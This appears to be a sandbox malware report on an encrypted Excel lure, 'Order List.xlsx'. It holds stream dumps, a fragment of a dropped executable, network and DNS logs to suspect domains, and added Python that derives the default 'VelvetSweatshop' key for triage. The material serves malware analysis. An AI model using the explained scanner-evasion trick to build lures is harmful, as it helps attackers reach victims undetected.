                                                                                                                                                                SHA-512:D2FA7F6E1E41BEBEDBDBA492A163B8388F2326B92D939E9352C32F5BE5A311BB75E4374524B2B314B5A426763113935E00F4C81AACC26ED08E9C9DD356DD7510
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Wt._.................h............... ........@.. ..............................p.....@.................................@...K.......B............................................................................ ............... ..H............text....f... ...h.................. ..`.rsrc...B............j..............@..@.reloc...............n..............@..B................p.......H.......p...............q...t..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r%..p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:CDFV2 Encrypted
                                                                                                                                                                Entropy (8bit):7.961051671042482
                                                                                                                                                                TrID:
                                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                File name:Order List.xlsx
                                                                                                                                                                File size:201728
                                                                                                                                                                MD5:b86395637ffd2f1a85acfe7a2f43f8d6
                                                                                                                                                                SHA1:f378cb75a5b73b995c78bb0a779488059cc44c44
                                                                                                                                                                SHA256:36a4989dba737cef8d0067e2b7a06ad29e5ec9ea96bdb7d3e41cf08af37c8553
                                                                                                                                                                SHA512:abd4b1ad29cbe0c8417612246d249a7b8033e5f7bb0a9779057784d07d4342db01587ea83187867c3ed6503ffab8f28f9799ac86638e0e4c0b675df63498f39e
                                                                                                                                                                SSDEEP:6144:X50Jf4bccS7FoW3mt/BFyCf2WObrOfryqRkfx:X50R2cc0Fax3df2vWGx
                                                                                                                                                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                Static OLE Info

                                                                                                                                                                General

                                                                                                                                                                Document Type:OLE
                                                                                                                                                                Number of OLE Files:1

                                                                                                                                                                OLE File "Order List.xlsx"

                                                                                                                                                                Indicators

                                                                                                                                                                Has Summary Info:False
                                                                                                                                                                Application Name:unknown
                                                                                                                                                                Encrypted Document:True
                                                                                                                                                                Contains Word Document Stream:False
                                                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                                Flash Objects Count:
                                                                                                                                                                Contains VBA Macros:False

                                                                                                                                                                Streams

                                                                                                                                                                Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                General
                                                                                                                                                                Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type: data
Stream Size: 64
Entropy: 2.73637206947
Base64 Encoded: False
Data ASCII: . . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw: 08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
General
Stream Path: \x6DataSpaces/DataSpaceMap
File Type: data
Stream Size: 112
Entropy: 2.7597816111
Base64 Encoded: False
Data ASCII: . . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw: 08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
General
Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type: data
Stream Size: 200
Entropy: 3.13335930328
Base64 Encoded: False
Data ASCII: X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
General
Stream Path: \x6DataSpaces/Version
File Type: data
Stream Size: 76
Entropy: 2.79079600998
Base64 Encoded: False
Data ASCII: < . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw: 3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 194888
General
Stream Path: EncryptedPackage
File Type: data
Stream Size: 194888
Entropy: 7.9982334381
Base64 Encoded: True
Data ASCII: > . . . . . . . . } . . I . . . N . . . . . Z . Q . [ . N " . . . . . . . . . . t } . . . B . . . . . ; . . . . b . . . s % . . N . o . . . . # . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . .
Data Raw: 3e f9 02 00 00 00 00 00 05 7d 7f 1c 49 b8 aa 0a 4e 98 88 c9 a1 19 5a f8 51 81 5b 91 4e 22 a2 b6 a3 01 b4 8f c2 fb 16 11 74 7d 08 d3 f0 42 c9 c0 ee 9f 0b 3b dd ec 91 c2 62 c0 ba ae 73 25 c6 d7 4e a7 6f f4 ef a5 88 23 81 1e 93 07 b5 e8 8c ef 61 b3 9d 8a 2b 69 ad 28 81 1e 93 07 b5 e8 8c ef 61 b3 9d 8a 2b 69 ad 28 81 1e 93 07 b5 e8 8c ef 61 b3 9d 8a 2b 69 ad 28 81 1e 93 07 b5 e8 8c ef

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
General
Stream Path: EncryptionInfo
File Type: data
Stream Size: 224
Entropy: 4.55670929471
Base64 Encoded: False
Data ASCII: . . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . z . . E . u s t . ' . . N . K 4 < . + V . . . . ! . . L . . . . . . . % . . . . . . / . a . K [ . - b . . b . p / . . . _ . . a
Data Raw: 04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00
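The streams above are what the "VelvetSweatshop" tag refers to: the workbook is an OLE2 container holding an ECMA-376 Standard Encryption package (EncryptionInfo version 4.2, flags 0x24 = fCryptoAPI|fAES, AlgID 0x660E = AES-128, AlgIDHash 0x8004 = SHA-1, KeySize 128, CSP "Microsoft Enhanced RSA and AES Cryptographic Provider"). Excel silently tries its built-in default password "VelvetSweatshop" when opening such a file, so the victim sees no password prompt, while a static scanner that does not know the default sees only an AES-encrypted blob (the EncryptedPackage entropy of 7.998 above) and never reaches the Equation Editor exploit inside. The following Python is an added example, not part of the Joe Sandbox report: it decodes the EncryptionInfo bytes exactly as dumped above, reads the plaintext size from the EncryptedPackage header, and implements the MS-OFFCRYPTO 2.3.4.7 key derivation for the default password. The report truncates the EncryptionInfo dump at 128 bytes, so the salt and verifier are not on the page; the 16-byte salt used in the demonstration is constructed, and the verifier check requires pycryptodome, which is treated as optional.

```python
"""Decode the EncryptionInfo stream of an encrypted OOXML (xlsx/docx) package
and derive the ECMA-376 "Standard Encryption" key from a password, as Excel
does with its built-in default password "VelvetSweatshop".
Added example; not code from the sandbox report."""
import hashlib
import struct

# EncryptionInfo bytes exactly as dumped in the report. The dump stops at
# 128 bytes, so the CSP name is cut off and the salt/verifier block that
# follows the 140-byte header is not available on the page.
ENCRYPTION_INFO_HEX = (
    "04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 "
    "04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 "
    "4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 "
    "68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 "
    "6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 "
    "6f 00 67 00 72 00 61 00 70 00 68 00"
)
# First 8 bytes of the EncryptedPackage stream as dumped in the report.
ENCRYPTED_PACKAGE_HEAD_HEX = "3e f9 02 00 00 00 00 00"

ALG_ID = {0x6801: "RC4", 0x660E: "AES-128", 0x660F: "AES-192", 0x6610: "AES-256"}
HASH_ID = {0x8004: "SHA-1"}
FLAG_CRYPTOAPI, FLAG_AES = 0x04, 0x20


def parse_encryption_info(data: bytes) -> dict:
    """Decode EncryptionVersionInfo, EncryptionHeader and, when the buffer is
    long enough, the EncryptionVerifier (MS-OFFCRYPTO 2.3.4.5)."""
    v_major, v_minor, flags, header_size = struct.unpack_from("<HHII", data, 0)
    if v_minor != 2 or v_major not in (2, 3, 4):
        raise ValueError(f"not Standard Encryption: version {v_major}.{v_minor}")
    hdr = data[12:12 + header_size]
    (h_flags, _size_extra, alg_id, alg_hash, key_size,
     provider_type, _r1, _r2) = struct.unpack_from("<8I", hdr, 0)
    # CSPName is null-terminated UTF-16LE; decode whole code units only so a
    # truncated dump still yields the readable prefix.
    raw_name = hdr[32:]
    csp_name = raw_name[: len(raw_name) // 2 * 2].decode("utf-16-le").split("\x00")[0]
    info = {
        "version": (v_major, v_minor), "flags": flags,
        "uses_cryptoapi": bool(h_flags & FLAG_CRYPTOAPI),
        "uses_aes": bool(h_flags & FLAG_AES),
        "algorithm": ALG_ID.get(alg_id, hex(alg_id)),
        "hash": HASH_ID.get(alg_hash, hex(alg_hash)),
        "key_bits": key_size, "provider_type": provider_type,
        "csp_name": csp_name,
        "truncated": len(data) < 12 + header_size, "verifier": None,
    }
    off = 12 + header_size  # EncryptionVerifier follows the header
    if len(data) >= off + 4:
        salt_size = struct.unpack_from("<I", data, off)[0]
        salt = data[off + 4: off + 4 + salt_size]
        enc_verifier = data[off + 4 + salt_size: off + 20 + salt_size]
        hash_size = struct.unpack_from("<I", data, off + 20 + salt_size)[0]
        enc_hash = data[off + 24 + salt_size: off + 24 + salt_size + 32]
        info["verifier"] = {"salt": salt, "encrypted_verifier": enc_verifier,
                            "verifier_hash_size": hash_size,
                            "encrypted_verifier_hash": enc_hash}
    return info


def derive_standard_key(password: str, salt: bytes, key_bits: int = 128,
                        spin_count: int = 50000) -> bytes:
    """Standard Encryption key derivation (MS-OFFCRYPTO 2.3.4.7):
    H0 = SHA1(salt || pw_utf16le); Hn = SHA1(LE32(n) || Hn-1) for 50000 rounds;
    Hfinal = SHA1(Hn || block 0); key = SHA1(0x36-pad ^ Hfinal) || SHA1(0x5C-pad ^ Hfinal)."""
    h = hashlib.sha1(salt + password.encode("utf-16-le")).digest()
    for n in range(spin_count):
        h = hashlib.sha1(struct.pack("<I", n) + h).digest()
    h_final = hashlib.sha1(h + b"\x00\x00\x00\x00").digest()
    padded = h_final.ljust(64, b"\x00")
    x1 = hashlib.sha1(bytes(0x36 ^ b for b in padded)).digest()
    x2 = hashlib.sha1(bytes(0x5C ^ b for b in padded)).digest()
    return (x1 + x2)[: key_bits // 8]


def verify_password(password: str, info: dict):
    """Check a password against the EncryptionVerifier: AES-ECB-decrypt the
    verifier and its hash, compare SHA1(verifier) with the decrypted hash.
    Returns None when no verifier is present or pycryptodome is missing."""
    v = info["verifier"]
    if v is None:
        return None
    try:
        from Crypto.Cipher import AES  # optional dependency (pycryptodome)
    except ImportError:
        return None
    aes = AES.new(derive_standard_key(password, v["salt"], info["key_bits"]),
                  AES.MODE_ECB)
    verifier = aes.decrypt(v["encrypted_verifier"])
    expected = aes.decrypt(v["encrypted_verifier_hash"])[: v["verifier_hash_size"]]
    return hashlib.sha1(verifier).digest() == expected


def encrypted_package_plaintext_size(head: bytes) -> int:
    """EncryptedPackage starts with the original (decrypted) size as a
    little-endian u64; the AES ciphertext, padded to 16 bytes, follows."""
    return struct.unpack_from("<Q", head, 0)[0]


if __name__ == "__main__":
    info = parse_encryption_info(bytes.fromhex(ENCRYPTION_INFO_HEX))
    for k, v in info.items():
        print(f"{k:>15}: {v}")
    print("plaintext size:", encrypted_package_plaintext_size(
        bytes.fromhex(ENCRYPTED_PACKAGE_HEAD_HEX)))
    # Constructed salt: the sample's real salt is not in the report dump.
    print("key:", derive_standard_key("VelvetSweatshop", bytes(range(16))).hex())
```

The plaintext size read from the EncryptedPackage header (194878 bytes) plus the 8-byte length prefix and AES padding accounts for the 194888-byte stream size listed above. On a complete EncryptionInfo stream (224 bytes here: 152 bytes of version and header, then a 16-byte salt, 16-byte encrypted verifier, 4-byte hash size and 32-byte encrypted verifier hash), `verify_password("VelvetSweatshop", info)` is the check that tells a triage pipeline it can decrypt and scan the package the same way Excel does.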

Network Behavior

Snort IDS Alerts

Timestamp  Protocol  SID  Message  Source Port  Dest Port  Source IP  Dest IP
11/20/20-12:06:20.512626  TCP  1201  ATTACK-RESPONSES 403 Forbidden  80  49167  34.102.136.180  192.168.2.22
11/20/20-12:06:53.215748  TCP  1201  ATTACK-RESPONSES 403 Forbidden  80  49172  34.102.136.180  192.168.2.22

Network Port Distribution

TCP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
Nov 20, 2020 12:05:20.490442991 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.608998060 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.609134912 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.609724998 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.729680061 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.729753017 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.729768038 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.729798079 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.729820013 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.729836941 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.730025053 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.730045080 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.850131989 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.850193024 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.850224018 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.850255013 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.850292921 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.850331068 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.850368977 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.850425959 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.850475073 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.850522041 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.850531101 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.968820095 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.968882084 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.968913078 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.968945026 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.968983889 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.969019890 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.969068050 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.969109058 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.969146013 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.969171047 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.969182968 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.969204903 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.969211102 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.969214916 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.969222069 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.969255924 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.969259977 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.969290972 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.969300032 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.969321966 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.969336987 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.969362020 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.969408989 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:20.969433069 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.969470024 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:20.972110033 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.090423107 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090480089 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090521097 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090559959 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090598106 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090646029 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090688944 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090723991 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.090729952 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090759039 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.090764999 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.090769053 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090769053 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.090807915 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090816975 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.090837955 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.090847015 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090874910 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.090886116 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090920925 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.090924025 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090941906 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.090971947 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.090981007 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.091015100 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.091029882 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.091052055 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.091058016 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.091090918 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.091110945 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.091129065 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.091134071 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.091166019 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.091185093 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.091202974 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.091217995 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.091239929 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.091259003 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.091288090 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.091289997 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.091329098 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.091345072 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.091366053 CET  80  49165  198.23.212.188  192.168.2.22
Nov 20, 2020 12:05:21.091377974 CET  49165  80  192.168.2.22  198.23.212.188
Nov 20, 2020 12:05:21.091404915 CET  80  49165  198.23.212.188  192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091423035 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091443062 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091464043 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091479063 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091497898 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091516972 CET8049165198.23.212.188192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2020 12:06:06.492037058 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 12:06:06.922523975 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Nov 20, 2020 12:06:14.227207899 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 12:06:14.526599884 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Nov 20, 2020 12:06:20.333092928 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 12:06:20.373017073 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Nov 20, 2020 12:06:30.583833933 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 12:06:30.625853062 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Nov 20, 2020 12:06:35.975224972 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 12:06:36.130682945 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Nov 20, 2020 12:06:41.410654068 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 12:06:41.452959061 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Nov 20, 2020 12:06:47.549561024 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 12:06:47.609066010 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Nov 20, 2020 12:06:53.033955097 CET | 61865 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 12:06:53.072963953 CET | 53 | 61865 | 8.8.8.8 | 192.168.2.22
Nov 20, 2020 12:06:58.232968092 CET | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 12:06:58.697033882 CET | 53 | 55171 | 8.8.8.8 | 192.168.2.22
Nov 20, 2020 12:07:03.698806047 CET | 52496 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 12:07:03.852780104 CET | 53 | 52496 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 20, 2020 12:06:06.492037058 CET | 192.168.2.22 | 8.8.8.8 | 0x708c | Standard query (0) | www.nanox.ltd | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:14.227207899 CET | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.alloutdoorspeaker.com | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:20.333092928 CET | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.teelinkz.com | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:30.583833933 CET | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.natcandy.com | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:35.975224972 CET | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.californiapropiedades.com | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:41.410654068 CET | 192.168.2.22 | 8.8.8.8 | 0x6ec7 | Standard query (0) | www.pornfilm3d.com | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:47.549561024 CET | 192.168.2.22 | 8.8.8.8 | 0xf09a | Standard query (0) | www.the-trinity-project.com | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:53.033955097 CET | 192.168.2.22 | 8.8.8.8 | 0x4b92 | Standard query (0) | www.crimson.school | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:58.232968092 CET | 192.168.2.22 | 8.8.8.8 | 0x4b93 | Standard query (0) | www.heritagediscovery.info | A (IP address) | IN (0x0001)
Nov 20, 2020 12:07:03.698806047 CET | 192.168.2.22 | 8.8.8.8 | 0x9e1c | Standard query (0) | www.tnicholson.design | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 20, 2020 12:06:06.922523975 CET | 8.8.8.8 | 192.168.2.22 | 0x708c | Name error (3) | www.nanox.ltd | none | none | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:14.526599884 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | www.alloutdoorspeaker.com | alloutdoorspeaker.com |  | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 12:06:14.526599884 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | alloutdoorspeaker.com |  | 137.59.52.234 | A (IP address) | IN (0x0001)
